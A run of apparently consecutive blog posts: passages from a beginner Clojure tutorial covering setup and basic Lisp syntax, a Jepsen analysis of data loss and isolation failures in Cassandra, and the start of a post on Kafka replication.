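Because these structures nest, lookups compose: each get returns a smaller structure for the next get to search. (Clojure also offers get-in, which we haven’t covered, as a shortcut for exactly this.) A sketch, using the Gini data above:

```clojure
(def gini
  {"Afghanistan" {2008 27.8}
   "Indonesia"   {2008 34.1 2010 35.6 2011 38.1}
   "Uruguay"     {2008 46.3 2009 46.3 2010 45.3}})

;; The outer get returns Indonesia's map of year -> coefficient;
;; the inner get extracts one year's value.
(get (get gini "Indonesia") 2010)
; => 35.6

;; get-in does the same walk, given a path of keys.
(get-in gini ["Uruguay" 2008])
; => 46.3
```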

We started this chapter with a discussion of types: groups of similar objects which obey the same rules. We learned that bigints, longs, ints, shorts, and bytes are all integers, that doubles and floats are approximations to decimal numbers, and that ratios represent fractions exactly. We learned the differences between strings for text, symbols as references, and keywords as short labels. Finally, we learned how to compose, alter, and inspect collections of elements. Armed with the basic nouns of Clojure, we’re ready to write a broad array of programs.

I’d like to conclude this tour with one last type of value. We’ve inspected dozens of types so far–but what happens when you turn the camera on itself?

user=> (type type)
clojure.core$type

What is this type thing, exactly? What are these verbs we’ve been learning, and where do they come from? This is the central question of chapter three: functions.

This guide aims to introduce newcomers and experienced programmers alike to the beauty of functional programming, starting with the simplest building blocks of software. You’ll need a computer, basic proficiency in the command line, a text editor, and an internet connection. By the end of this series, you’ll have a thorough command of the Clojure programming language.

Who is this guide for?

Science, technology, engineering, and mathematics are deeply rewarding fields, yet few women enter STEM as a career path. Still more are discouraged by a culture which repeatedly asserts that women lack the analytic aptitude for writing software, that they are not driven enough to be successful scientists, that it’s not cool to pursue a passion for structural engineering. Those few with the talent, encouragement, and persistence to break into science and tech are discouraged by persistent sexism in practice: the old boy’s club of tenure, being passed over for promotions, isolation from peers, and flat-out assault. This landscape sucks. I want to help change it.

Women Who Code, PyLadies, Black Girls Code, RailsBridge, Girls Who Code, Girl Develop It, and Lambda Ladies are just a few of the fantastic groups helping women enter and thrive in software. I wholeheartedly support these efforts.

In addition, I want to help in my little corner of the technical community–functional programming and distributed systems–by making high-quality educational resources available for free. The Jepsen series has been, in part, an effort to share my enthusiasm for distributed systems with beginners of all stripes–but especially for women, LGBT folks, and people of color.

As technical authors, we often assume that our readers are white, that our readers are straight, that our readers are traditionally male. This is the invisible default in US culture, and it’s especially true in tech. People continue to assume on the basis of my software and writing that I’m straight, because well hey, it’s a statistically reasonable assumption.

But I’m not straight. I get called faggot, cocksucker, and sinner. People say they’ll pray for me. When I walk hand-in-hand with my boyfriend, people roll down their car windows and stare. They threaten to beat me up or kill me. Every day I’m aware that I’m the only gay person some people know, and that I can show that not all gay people are effeminate, or hypermasculine, or ditzy, or obsessed with image. That you can be a manicurist or a mathematician or both. Being different, being a stranger in your culture, comes with all kinds of challenges. I can’t speak to everyone’s experience, but I can take a pretty good guess.

At the same time, in the technical community I’ve found overwhelming warmth and support, from people of all stripes. My peers stand up for me every day, and I’m so thankful–especially you straight dudes–for understanding a bit of what it’s like to be different. I want to extend that same understanding, that same empathy, to people unlike myself. Moreover, I want to reassure everyone that though they may feel different, they do have a place in this community.

So before we begin, I want to reinforce that you can program, that you can do math, that you can design car suspensions and fire suppression systems and spacecraft control software and distributed databases, regardless of what your classmates and media and even fellow engineers think. You don’t have to be white, you don’t have to be straight, you don’t have to be a man. You can grow up never having touched a computer and still become a skilled programmer. Yeah, it’s harder–and yeah, people will give you shit, but that’s not your fault and has nothing to do with your ability or your right to do what you love. All it takes to be a good engineer, scientist, or mathematician is your curiosity, your passion, the right teaching material, and putting in the hours.

There’s nothing in this guide that’s just for lesbian grandmas or just for mixed-race kids; bros, you’re welcome here too. There’s nothing dumbed down. We’re gonna go as deep into the ideas of programming as I know how to go, and we’re gonna do it with everyone on board.

No matter who you are or who people think you are, this guide is for you.

Why Clojure?

This book is about how to program. We’ll be learning in Clojure, which is a modern dialect of a very old family of computer languages, called Lisp. You’ll find that many of this book’s ideas will translate readily to other languages, though they may be expressed in different ways.

We’re going to explore the nature of syntax, metalanguages, values, references, mutation, control flow, and concurrency. Many languages leave these ideas implicit in the language construction, or don’t have a concept of metalanguages or concurrency at all. Clojure makes these ideas explicit, first-class language constructs.

At the same time, we’re going to defer or omit any serious discussion of static type analysis, hardware, and performance. This is not to say that these ideas aren’t important; just that they don’t fit well within this particular narrative arc. For a deep exploration of type theory I recommend a study in Haskell, and for a better understanding of underlying hardware, learning C and an assembly language will undoubtedly help.

In more general terms, Clojure is a well-rounded language. It offers broad library support and runs on multiple operating systems. Clojure performance is not terrific, but is orders of magnitude faster than Ruby, Python, or Javascript. Unlike some faster languages, Clojure emphasizes safety in its type system and approach to parallelism, making it easier to write correct multithreaded programs. Clojure is concise, requiring very little code to express complex operations. It offers a REPL and dynamic type system: ideal for beginners to experiment with, and well-suited for manipulating complex data structures. A consistently designed standard library and full-featured set of core datatypes rounds out the Clojure toolbox.

Finally, there are some drawbacks. As a compiled language, Clojure is much slower to start than a scripting language; this makes it unsuitable for writing small scripts for interactive use. Clojure is also not well-suited for high-performance numeric operations. Though it is possible, you have to jump through hoops to achieve performance comparable with Java. I’ll do my best to call out these constraints and shortcomings as we proceed through the text.

With that context out of the way, let’s get started by installing Clojure!

Getting set up

First, you’ll need a Java Virtual Machine, or JVM, and its associated development tools, called the JDK. This is the software which runs a Clojure program. If you’re on Windows, install Oracle JDK 1.7. If you’re on OS X or Linux, you may already have a JDK installed. In a terminal, try:

which javac

If you see something like

/usr/bin/javac

Then you’re good to go. If you don’t see any output from that command, install the appropriate Oracle JDK 1.7 for your operating system, or whatever JDK your package manager has available.

When you have a JDK, you’ll need Leiningen, the Clojure build tool. If you’re on a Linux or OS X computer, the instructions below should get you going right away. If you’re on Windows, see the Leiningen page for an installer. If you get stuck, you might want to start with a primer on command line basics.

mkdir -p ~/bin
cd ~/bin
curl -O https://raw.githubusercontent.com/technomancy/leiningen/stable/bin/lein
chmod a+x lein

Leiningen automatically handles installing Clojure, finding libraries from the internet, and building and running your programs. We’ll create a new Leiningen project to play around in:

cd
lein new scratch

This creates a new directory in your homedir, called scratch. If you see command not found instead, it means the directory ~/bin isn’t registered with your terminal as a place to search for programs. To fix this, add the line

export PATH="$PATH":~/bin

to the file .bash_profile in your home directory, then run source ~/.bash_profile. Re-running lein new scratch should work.

Let’s enter that directory, and start using Clojure itself:

cd scratch
lein repl

The structure of programs

When you type lein repl at the terminal, you’ll see something like this:

aphyr@waterhouse:~/scratch$ lein repl
nREPL server started on port 45413
REPL-y 0.2.0
Clojure 1.5.1
    Docs: (doc function-name-here)
          (find-doc "part-of-name-here")
  Source: (source function-name-here)
 Javadoc: (javadoc java-object-or-class-here)
    Exit: Control+D or (exit) or (quit)
user=>

This is an interactive Clojure environment called a REPL, for “Read, Evaluate, Print Loop”. It’s going to read a program we enter, run that program, and print the results. REPLs give you quick feedback, so they’re a great way to explore a program interactively, run tests, and prototype new ideas.

Let’s write a simple program. The simplest, in fact. Type “nil”, and hit enter.

user=> nil
nil

nil is the most basic value in Clojure. It represents emptiness, nothing-doing, not-a-thing. The absence of information.

user=> true
true
user=> false
false

true and false are a pair of special values called Booleans. They mean exactly what you think: whether a statement is true or false. true, false, and nil form the three poles of the Lisp logical system.

user=> 0
0

This is the number zero. Its numeric friends are 1, -47, 1.2e-4, 1/3, and so on. We might also talk about strings, which are chunks of text surrounded by double quotes:

user=> "hi there!"
"hi there!"

nil, true, 0, and "hi there!" are all different types of values; the nouns of programming. Just as one could say “House.” in English, we can write a program like "hello, world" and it evaluates to itself: the string "hello world". But most sentences aren’t just about stating the existence of a thing; they involve action. We need verbs.

user=> inc
#<core$inc clojure.core$inc@6f7ef41c>

This is a verb called inc–short for “increment”. Specifically, inc is a symbol which points to a verb: #<core$inc clojure.core$inc@6f7ef41c>– just like the word “run” is a name for the concept of running.

There’s a key distinction here–that a signifier, a reference, a label, is not the same as the signified, the referent, the concept itself. If you write the word “run” on paper, the ink means nothing by itself. It’s just a symbol. But in the mind of a reader, that symbol takes on meaning; the idea of running.

Unlike the number 0, or the string “hi”, symbols are references to other values. When Clojure evaluates a symbol, it looks up that symbol’s meaning. Look up inc, and you get #<core$inc clojure.core$inc@6f7ef41c>.

Can we refer to the symbol itself, without looking up its meaning?

user=> 'inc
inc

Yes. The single quote ' escapes a sentence. In programming languages, we call sentences expressions or statements. A quote says “Rather than evaluating this expression’s text, simply return the text itself, unchanged.” Quote a symbol, get a symbol. Quote a number, get a number. Quote anything, and get it back exactly as it came in.

user=> '123
123
user=> '"foo"
"foo"
user=> '(1 2 3)
(1 2 3)

A new kind of value, surrounded by parentheses: the list. LISP originally stood for LISt Processing, and lists are still at the core of the language. In fact, they form the most basic way to compose expressions, or sentences. A list is a single expression which has multiple parts. For instance, this list contains three elements: the numbers 1, 2, and 3. Lists can contain anything: numbers, strings, even other lists:

user=> '(nil "hi")
(nil "hi")

A list containing two elements: the number 1, and a second list. That list contains two elements: the number 2, and another list. That list contains two elements: 3, and an empty list.

user=> '(1 (2 (3 ())))
(1 (2 (3 ())))

You could think of this structure as a tree–which is a provocative idea, because languages are like trees too: sentences are comprised of clauses, which can be nested, and each clause may have subjects modified by adjectives, and verbs modified by adverbs, and so on. “Lindsay, my best friend, took the dog which we found together at the pound on fourth street, for a walk with her mother Michelle.”

[Parse-tree diagram of the sentence above: “took” at the root, with branches for “Lindsay, my best friend”, “the dog which we found together at the pound on fourth street”, “for a walk”, and “with her mother Michelle”.]

But let’s try something simpler. Something we know how to talk about. “Increment the number zero.” As a tree:

[Tree diagram: “increment” at the root, with “the number zero” as its child.]

We have a symbol for incrementing, and we know how to write the number zero. Let’s combine them in a list:

user=> '(inc 0)
(inc 0)

A basic sentence. Remember, since it’s quoted, we’re talking about the tree, the text, the expression, by itself. Absent interpretation. If we remove the single-quote, Clojure will interpret the expression:

user=> (inc 0)
1

Incrementing zero yields one. And if we wanted to increment that value?

user=> (inc (inc 0))
2

A sentence in Lisp is a list. It starts with a verb, and is followed by zero or more objects for that verb to act on. Each part of the list can itself be another list, in which case that nested list is evaluated first, just like a nested clause in a sentence. When we type

(inc (inc 0))

Clojure first looks up the meanings for the symbols in the code:

(#<core$inc clojure.core$inc@6f7ef41c> (#<core$inc clojure.core$inc@6f7ef41c> 0))

Then evaluates the innermost list (inc 0), which becomes the number 1:

(#<core$inc clojure.core$inc@6f7ef41c> 1)

Finally, it evaluates the outer list, incrementing the number 1:

2

Every list starts with a verb. Parts of a list are evaluated from left to right. Innermost lists are evaluated before outer lists.

(+ 1 (- 5 2) (+ 3 4))
(+ 1 3 (+ 3 4))
(+ 1 3 7)
11

That’s it.

The entire grammar of Lisp: the structure for every expression in the language. We transform expressions by substituting meanings for symbols, and obtain some result. This is the core of the Lambda Calculus, and it is the theoretical basis for almost all computer languages. Ruby, Javascript, C, Haskell; all languages express the text of their programs in different ways, but internally all construct a tree of expressions. Lisp simply makes it explicit.

Review

We started by learning a few basic nouns: numbers like 5, strings like "cat", and symbols like inc and +. We saw how quoting makes the difference between an expression itself and the thing it evaluates to. We discovered symbols as names for other values, just like how words represent concepts in any other language. Finally, we combined lists to make trees, and used those trees to represent a program.

With these basic elements of syntax in place, it’s time to expand our vocabulary with new verbs and nouns; learning to represent more complex values and transform them in different ways.

Previously on Jepsen, we learned about Kafka’s proposed replication design.

Cassandra is a Dynamo system; like Riak, it divides a hash ring into several chunks, and keeps N replicas of each chunk on different nodes. It uses tunable quorums, hinted handoff, and active anti-entropy to keep replicas up to date. Unlike the Dynamo paper and some of its peers, Cassandra eschews vector clocks in favor of a pure last-write-wins approach.

Some Write Loses

If you read the Riak article, you might be freaking out at this point. In Riak, last-write-wins resulted in dropping 30-70% of writes, even with the strongest consistency settings (R=W=PR=PW=ALL), even with a perfect lock service ensuring writes did not occur simultaneously. To understand why, I’d like to briefly review the problem with last-write-wins in asynchronous networks.

cassandra-lww-diagram.jpg

In this causality diagram, two clients (far left and far right) add the elements “a”, “b”, and “c” to a set stored in an LWW register (middle line). The left client adds a, which is read by both clients. One client adds b, constructing the set [a b]. The other adds c, constructing the set [a c]. Both write their values back. Because the register is last-write-wins, it preserves whichever arrives with the highest timestamp. In this case, it’s as if the write from the client on the left never even happened. However, it could just as easily have discarded the write from the right-hand client. Without a strong external coordinator, there’s just no way to tell whose data will be preserved, and whose will be thrown away.

Again: in an LWW register, the only conditions under which you can guarantee your write will not be silently ignored are when the register’s value is immutable. If you never change the value, it doesn’t matter which copy you preserve.
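
The failure mode above can be sketched in a few lines of Python. This is a toy model for illustration only, not Cassandra's implementation: a register keeps whichever write carries the highest timestamp, and two clients do concurrent read-modify-write cycles against it.

```python
# Toy last-write-wins register: keeps the value with the highest timestamp.
class LWWRegister:
    def __init__(self):
        self.value, self.ts = frozenset(), 0

    def write(self, value, ts):
        # Preserve whichever write arrives with the higher timestamp.
        if ts > self.ts:
            self.value, self.ts = value, ts

reg = LWWRegister()
reg.write(frozenset({"a"}), ts=1)

# Both clients read {a}, then concurrently add an element and write back.
left = reg.value | {"b"}    # left client builds {a, b}
right = reg.value | {"c"}   # right client builds {a, c}

reg.write(left, ts=2)
reg.write(right, ts=3)      # arrives with the higher timestamp

print(sorted(reg.value))    # ['a', 'c'] -- the {a, b} write is silently lost
```

The left client's write was acknowledged, but no trace of it survives: exactly the silent loss shown in the causality diagram.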

Vector clocks avoid this problem by identifying conflicting writes, and allowing you to merge them together.

cassandra-vclock-merge.jpg

Because there’s no well-defined order for potential conflicts, the merge function needs to be associative, commutative, and idempotent. If it satisfies those three properties (in essence, if you can merge any values in any order and get the same result), the system forms a semilattice known as a CRDT, and you recover a type of order-free consistency known as lattice consistency. Last-write-wins is a particular type of CRDT–albeit, not a particularly good one, because it destroys information nondeterministically.
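
As a concrete illustration, here's a short Python sketch (hypothetical, just to make the three properties tangible) checking them for the simplest CRDT merge function: set union, as used by a grow-only set.

```python
# Set union is associative, commutative, and idempotent, so a grow-only
# set converges to the same value no matter the order of merges.
def merge(a, b):
    return a | b

x, y, z = {1}, {2}, {3}
assert merge(merge(x, y), z) == merge(x, merge(y, z))  # associative
assert merge(x, y) == merge(y, x)                      # commutative
assert merge(x, x) == x                                # idempotent
```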

Early in its history, Cassandra chose not to implement vector clocks for performance reasons. Vclocks (typically) require a read before each write. By using last-write-wins in all cases, and ignoring the causality graph, Cassandra can cut the number of round trips required for a write from 2 to 1, and obtain a significant speedup. The downside is that there is no safe way to modify a Cassandra cell.

Some people claim you can serialize updates to a cell by perfectly synchronizing your clocks, using ConsistencyLevel.QUORUM or ALL, and using an external lock service to prevent simultaneous operations. Heck, the official Cassandra documentation even claims this:

cassandra-cap.png

cassandra-consistency.png

As we’ll see throughout this post, the Cassandra documentation can be less than accurate. Here’s a Jepsen test which mutates the same cell repeatedly, using perfectly synchronized clocks, QUORUM consistency, and a perfect lock service:

$ lein run lock cassandra
...
Writes completed in 200.036 seconds

2000 total
1009 acknowledged
724 survivors
285 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
1 3 6 8 11 13 ... 1986 1988 1991 1993 1996 1998
0.5045 ack rate
0.2824579 loss rate
0.0 unacknowledged but successful rate

Losing 28% of your supposedly committed data is not serializable by any definition. Next question.

CQL and CRDTs

Without vector clocks, Cassandra can’t safely change a cell–but writing immutable data is safe. Consequently, Cassandra has evolved around those constraints, allowing you to efficiently journal thousands of cells to a single row, and to retrieve them in sorted order. Instead of modifying a cell, you write each distinct change to its own UUID-keyed cell. Then, at read time, you read all the cells back and apply a merge function to obtain a result.
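
Here's a hedged Python sketch of that pattern (hypothetical names, not the CQL machinery): every change is appended as a fresh, UUID-keyed cell, and the merge function runs only at read time.

```python
import uuid

# Wide-row pattern: never mutate a cell; append each change under a new UUID.
row = {}

def add(element):
    row[uuid.uuid4()] = element   # immutable write: nothing is overwritten

def read():
    # Merge function applied at read time -- here, set union over all cells.
    return set(row.values())

add("a"); add("b"); add("a")      # duplicate adds are harmless
print(sorted(read()))             # ['a', 'b']
```

Because every write lands in its own cell, concurrent writers can't clobber each other; conflicts are resolved by the merge, not by timestamps.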

cassandra-immutable-oplog-2.jpg
cassandra-merge.jpg

Cassandra’s query language, CQL, provides some collection-oriented data structures around this model: sets, lists, maps, and so forth. They’re CRDTs, though the semantics don’t align with what you’ll find in the INRIA paper–no G-sets, 2P-sets, OR-sets, etc. However, some operations are safe–for instance, adding elements to a CQL set:

0 unrecoverable timeouts
Collecting results.
Writes completed in 200.036 seconds

2000 total
2000 acknowledged
2000 survivors
All 2000 writes succeeded. :-D

That’s terrific! This is the same behavior we saw with G-sets in Riak. However, not all CQL collection operations are intuitively correct. In particular, I’d be wary of the index-based operations for lists, updating elements in a map, and any type of deletions. Deletes are implemented by writing special tombstone cells, which declare a range of other cells to be ignored. Because Cassandra doesn’t use techniques like OR-sets, you can potentially delete records that haven’t been seen yet–even delete writes from the future. Cassandra users jokingly refer to this behavior as “doomstones”.

The important thing to remember is that because there are no ordering constraints on writes, one’s merge function must still be associative and commutative. Just as we saw with Riak, AP systems require you to reason about order-free data structures. In fact, Cassandra and Riak are (almost) formally equivalent in their consistency semantics–the primary differences are in the granularity of updates, in garbage collection/history compaction, and in performance.

Bottom line: CQL collections are a great idea, and you should use them! Read the specs carefully to figure out whether CQL operations meet your needs, and if they don’t, you can always write your own CRDTs on top of wide rows.

Counters

If you’re familiar with CRDTs, you might be wondering whether Cassandra’s counter type is a PN-counter–a commutative, monotonic data structure which can be incremented and decremented in an eventually consistent way. The answer is no: Cassandra (via Twitter, politics, etc.) wound up with a less safe type of data structure. Consequently, Cassandra counters will over- or under-count by a wide range during a network partition.

If partitioned for about half of the test run, I found counters could drift by up to 50% of the expected value. Here’s a relatively well-behaved run, drifting by less than a percent.

10000 total
9700 acknowledged
9921 survivors

Isolation

In Coming up in Cassandra 1.1: Row Level Isolation, and Atomic batches in Cassandra 1.2, DataStax asserts that a write which updates multiple keys in the same row will be atomic and isolated.

Cassandra 1.1 guarantees that if you update both the login and the password in the same update (for the same row key) then no concurrent read may see only a partial update.

And from the official documentation on concurrency control:

Full row-level isolation is now in place so that writes to a row are isolated to the client performing the write and are not visible to any other user until they are complete. From a transactional ACID (atomic, consistent, isolated, durable) standpoint, this enhancement now gives Cassandra transactional AID support.

We know what “atomic” means: either all of the changes in the transaction complete, or none of them do. But what does “isolated” mean? Isolated in the sense of ACID? Let’s ask Hacker News what they think Cassandra’s isolation provides:

isolation4.png isolation5.png isolation2.png isolation1.png isolation3.png

Peter Bailis pointed me at two really excellent papers on isolation and consistency, including Berenson et al’s “A Critique of ANSI SQL Isolation Levels”–I really recommend digging into them if you’re curious about this problem. Isolation comes in many flavors, or strengths, depending on what sorts of causal histories are allowed. Serializability is one of the strongest: all transactions appear to occur in a single well-defined non-interleaved order. Cursor Stability (CS) and Snapshot Isolation (SI) are somewhat weaker.

ANSI SQL defines four levels of isolation, which really have more to do with the historical behavior of various database systems than with behavior that any sane person would consider distinguishable, so I’m not going to get into the details–but suffice it to say that there are a range of phenomena which are prohibited by those isolation levels. In order from least to most awful:

  • P4: Lost Update
  • P3: Phantom
  • P2: Fuzzy read
  • P1: Dirty read
  • P0: Dirty write

ANSI SQL’s SERIALIZABLE level prohibits P3-P0; REPEATABLE READ prohibits P2 and below, READ COMMITTED prohibits P1 and below, and READ UNCOMMITTED only prohibits P0.

p0-example.jpg
cassandra-comparison-diagram.jpg

P0, or “dirty write” is especially important because all isolation levels must prohibit it. In P0, one transaction modifies some data; then a second transaction also modifies that data, before the first transaction commits. We never want writes from two different transactions to be mixed together, because it might violate integrity relationships which each transaction held independently. For instance, we might write [x=1, y=1] in one transaction, and [x=2, y=2] in a different transaction, assuming that x will always be equal to y. P0 allows those transactions to result in [x=1, y=2], or [x=2, y=1].

Cassandra allows P0.

The key thing to remember here is that in Cassandra, the order of writes is completely irrelevant. Any write made to the cluster could eventually wind up winning, if it has a higher timestamp. But–what happens if Cassandra sees two copies of a cell with the same timestamp?

It picks the lexicographically bigger value.

That means that if the values written to two distinct cells don’t have the same sort order (which is likely), Cassandra could pick final cell values from different transactions. For instance, we might write [1 -1] and [2 -2]. 2 is greater than 1, so the first cell will be 2. But -1 is bigger than -2, so -1 wins in the second cell. The result? [2 -1].
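
A quick Python sketch of that tie-break (a simplified model: numeric comparison standing in for Cassandra's byte-lexicographic one, and each cell stored as a timestamp/value pair):

```python
# Per-cell conflict resolution: highest timestamp wins; on a tie, the
# bigger value wins. Comparing (ts, value) tuples captures both rules.
def resolve(a, b):
    return max(a, b)

t = 12345                      # both transactions collide on one timestamp
txn1 = [(t, 1), (t, -1)]       # transaction 1 writes [1 -1]
txn2 = [(t, 2), (t, -2)]       # transaction 2 writes [2 -2]

row = [resolve(c1, c2)[1] for c1, c2 in zip(txn1, txn2)]
print(row)  # [2, -1] -- each cell picked from a different transaction
```

The resulting row mixes the two writes: a dirty write, visible to every subsequent reader.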

“But,” you might protest, “In order for that to happen, you’d need two timestamps to collide. It’s really unlikely that two writes will get the same microsecond-resolution timestamp, right? I’ve never seen it happen in my cluster.”

Well, it depends. If we assume N writes per second by Poisson processes to the same row, the probability of any given read seeing a conflicting value grows as the writes come closer together.

cassandra-ts-conflict-visible-chart.jpg
rate    probability of conflict/read
------------------------------------
1       1.31E-7
10      5.74E-6
100     5.30E-5
1000    5.09E-4
10000   0.00504
100000  0.0492
1000000 0.417

So if you do 100,000 writes/sec, on any given read you’ve got a 5% chance of seeing corrupt data. If you do 10 writes/sec and 1 read/sec, you’ve got about a 1/3 chance of seeing corrupt data in any given day.
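
That daily figure is easy to sanity-check, assuming independent reads and the per-read conflict probability from the table above:

```python
# At 10 writes/sec the table gives p = 5.74e-6 conflict probability per
# read; one read per second means 86,400 independent chances per day.
p = 5.74e-6
reads_per_day = 86_400
p_day = 1 - (1 - p) ** reads_per_day
print(p_day)  # ~0.39: roughly a 1/3 chance of seeing corruption each day
```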

What if you write many rows over time–maybe 2 writes to each row, separated by a mean delta of 100 milliseconds? Then the theoretical probability of any given row being corrupt is about 5 × 10⁻⁶. That’s a pretty small probability–and remember, most applications can tolerate some small degree of corrupt data. Let’s confirm it with an experiment:

10000 total
9899 acknowledged
9942 survivors
58 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
127 253 277 339 423 434 ... 8112 8297 8650 8973 9096 9504
101 unacknowledged writes found! ヽ(´ー`)ノ
1059 1102 1139 1142 1143 1158 ... 2701 2720 2721 2800 2815 2860
0.9899 ack rate
0.0058591776 loss rate
0.01020305 unacknowledged but successful rate

Note that “writes lost” here means corrupted rows: entirely missing rows are treated as successes. Roughly 1 in 200 rows were corrupt! That’s way worse than 10⁻⁶! What gives?

It turns out that somewhere in this maze of software, either Cassandra, the DataStax Java driver, or Cassaforte is taking the current time in milliseconds and tacking on three zeroes to the end, calling it good. The probability of millisecond conflicts is significantly higher than microsecond conflicts, which is why we saw so much corrupt data.
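
A simple collision model (my own assumption, not anything from the Cassandra spec) reproduces both numbers: say the first write lands at a uniform offset within its timestamp bucket, and the second follows after an exponential delay with mean 100 ms. At microsecond resolution the mean delay spans 100,000 buckets; at millisecond resolution, only 100.

```python
from math import exp

# P(two writes share a bucket), where the second write trails the first
# by an exponential delay with the given mean (measured in buckets):
#   P = integral over u in [0,1) of P(delay < 1 - u) du
#     = 1 - m * (1 - exp(-1/m))
def p_collision(mean_delta_in_buckets):
    m = float(mean_delta_in_buckets)
    return 1 - m * (1 - exp(-1 / m))

print(p_collision(100_000))  # microsecond resolution: ~5e-6 per row
print(p_collision(100))      # millisecond resolution: ~5e-3, i.e. 1 in 200
```

Under this model, dropping from microsecond to millisecond resolution raises the per-row corruption probability a thousandfold, right into the 1-in-200 range the test observed.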

Long story short, Cassandra row isolation is probabilistic at best; and remember, the only reason you actually want isolation is because you plan on doing two operations at the same time. If you rely on isolation, in any sense of the word, in Cassandra, you need to consider your tolerance for data corruption, and verify that you’re actually generating timestamps with the expected distribution. A strong external coordinator which guarantees unique timestamps might be of use.

Lightweight Transactions

In Cassandra 2.0.0, Lightweight Transactions offer linearizable consistency for compare-and-set operations. The implementation is based on naive Paxos–requiring four round trips for each write–but the performance can be improved with time. The important thing is that Cassandra is first to have a distributed linearizable data store, or something.

That said, sometimes you really do need linearizable operations. That’s why we added lightweight transactions in Cassandra 2.0 This is a sign of Cassandra maturing — Cassandra 1.0 (released October 2011) was the fulfilment of its designers original vision; Cassandra 2.0 takes it in new directions to make it even more powerful.

Open source has had the reputation of producing good imitations, but not innovation. Perhaps Cassandra’s origins as a hybrid of Dynamo and Bigtable did not disprove this, but Apache Cassandra’s development of lightweight transactions and CQL are true industry firsts.

The first thing you’ll notice if you try to test the new transaction system is that the Java driver doesn’t support it. It’ll throw some weird exceptions like “unknown consistency level SERIAL”, because it doesn’t support the v2 native Cassandra protocol yet. So you’ll need to use the Python Thrift client, or, in my case, get a patched client from DataStax.

The second thing you’ll notice is deadlocks. In my Jepsen tests, the cluster would go unresponsive after the first 10 or so transactions–and it would never recover. Any further attempts to modify a cell via transaction would spin endlessly in failed transactions, until I manually truncated the system.paxos table.

You can’t make this shit up.

So you confer with DataStax for a while, and they manage to reproduce and fix the bug: #6029 (Lightweight transactions race render primary key useless), and #5985 (Paxos replay of in progress update is incorrect). You start building patched versions of Cassandra.

git checkout paxos-fixed-hopefully

Let’s give it a whirl. In this transaction test, we perform repeated compare-and-set operations against a single cell, retrying failed attempts for up to 10 seconds. The first thing you’ll notice is that those four round-trips aren’t exactly lightweight, which means that at 50 transactions/sec, the majority of transaction attempts time out:

cassandra-txn-latency.png

But we’re less concerned with performance or availability than safety. Let’s slow down the test to 5 transactions/sec to reduce contention, and check: are lightweight transactions actually linearizable?

2000 total
829 acknowledged
827 survivors
3 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
(102 1628 1988)
1 unacknowledged writes found! ヽ(´ー`)ノ
(283)
0.4145 ack rate
0.0036188178 loss rate
0.0012062726 unacknowledged but successful rate

No. Cassandra lightweight transactions are not even close to correct. Depending on throughput, they may drop anywhere from 1-5% of acknowledged writes–and this doesn’t even require a network partition to demonstrate. It’s just a broken implementation of Paxos. In addition to the deadlock bug, these Jepsen tests revealed #6012 (Cassandra may accept multiple proposals for a single Paxos round) and #6013 (unnecessarily high false negative probabilities).

Paxos is notoriously difficult to implement correctly. The Chubby authors note:

Our tests start in safety mode and inject random failures into the system. After running for a predetermined period of time, we stop injecting failures and give the system time to fully recover. Then we switch the test to liveness mode. The purpose for the liveness test is to verify that the system does not deadlock after a sequence of failures.

This test proved useful in finding various subtle protocol errors, including errors in our group membership implementation, and our modifications to deal with corrupted disks…. We found additional bugs, some of which took weeks of simulated execution time (at extremely high failure rates) to find.

Our hooks can be used to crash a replica, disconnect it from other replicas for a period of time or force a replica to pretend that it is no longer the master. This test found five subtle bugs in Chubby related to master failover in its first two weeks.

And in particular, I want to emphasize:

By their very nature, fault-tolerant systems try to mask problems. Thus they can mask bugs or configuration problems while insidiously lowering their own fault-tolerance.

The bugs I found were low-hanging fruit: anyone who ran a few hundred simple transactions could reproduce them, even without causing a single node or network failure. Why didn’t DataStax catch this in the release process? Why publish glowing blog posts and smug retrospectives if the most fundamental safety properties of the application haven’t been trivially verified? And if I hadn’t reported these bugs, how many users do you suppose would have been subject to silent data loss or corruption in prod?

I can’t say this strongly enough: One way or another, software is always tested: either by the maintainers, by users, or by applications in production. One of my goals in this series is to push database vendors to test their software prior to release, so that we can all enjoy safer, faster systems. If you’re writing a database, please try to verify its correctness experimentally. You don’t need to do a perfect job–testing is tough!–but a little effort can catch 90% of the bugs.

Final thoughts

DataStax and the open-source community around Cassandra have been working hard on the AP storage problem for several years, and it shows. Cassandra runs on thousand-node clusters and accepts phenomenal write volume. It’s extraordinarily well-suited to high-throughput capture of immutable or otherwise log-oriented data, and its AAE and tunable durability features work well. It is, in short, a capable AP datastore, and though I haven’t deployed it personally, many engineers I respect wholeheartedly recommend it based on their production experience.

Jonathan Ellis, Aleksey Yeschenko, and Patrick McFadin were all generous in helping me understand Cassandra’s model, and I hope that I have depicted it accurately here. Any errors are mine alone. I’m especially thankful that they volunteered so much of their time on nights and weekends to help someone tear apart their hard work, and that they’ve fixed the bugs I’ve found so quickly. Reproducing and fixing distributed systems bugs is an especially challenging task, and it speaks to the skill of the entire Cassandra team.

DataStax has adapted some of these Jepsen tests for use in their internal testing process, and, like Basho, may use Jepsen directly to help test future releases. I’m optimistic that they’ll notify users that the transactional features are unsafe in the current release, and clarify their documentation and marketing. Again, there’s nothing technically wrong with many of the behaviors I’ve discussed above–they’re simply subtle, and deserve clear exposition so that users can interpret them correctly.

I’m looking forward to watching a good database improve.

In the last Jepsen post, we learned about NuoDB. Now it’s time to switch gears and discuss Kafka. Up next: Cassandra.

Kafka is a messaging system which provides an immutable, linearizable, sharded log of messages. Throughput and storage capacity scale linearly with nodes, and thanks to some impressive engineering tricks, Kafka can push astonishingly high volume through each node, often saturating disk, network, or both. Consumers use Zookeeper to coordinate their reads over the message log, providing efficient at-least-once delivery–and some other nice properties, like replayability.

kafka-ca.png

In the upcoming 0.8 release, Kafka is introducing a new feature: replication. Replication enhances the durability and availability of Kafka by duplicating each shard’s data across multiple nodes. In this post, we’ll explore how Kafka’s proposed replication system works, and see a new type of failure.

Here’s a slide from Jun Rao’s overview of the replication architecture. In the context of the CAP theorem, Kafka claims to provide both serializability and availability by sacrificing partition tolerance. Kafka can do this because LinkedIn’s brokers run in a datacenter, where partitions are rare.

Note that the claimed behavior isn’t impossible: Kafka could be a CP system, providing “bytewise identical replicas” and remaining available whenever, say, a majority of nodes are connected. It just can’t be fully available if a partition occurs. On the other hand, we saw that NuoDB, in purporting to refute the CAP theorem, actually sacrificed availability. What happens to Kafka during a network partition?

Design

kafka-isr.jpg
kafka-isr-1.jpg
kafka-tolerance-leader-isolated.jpg
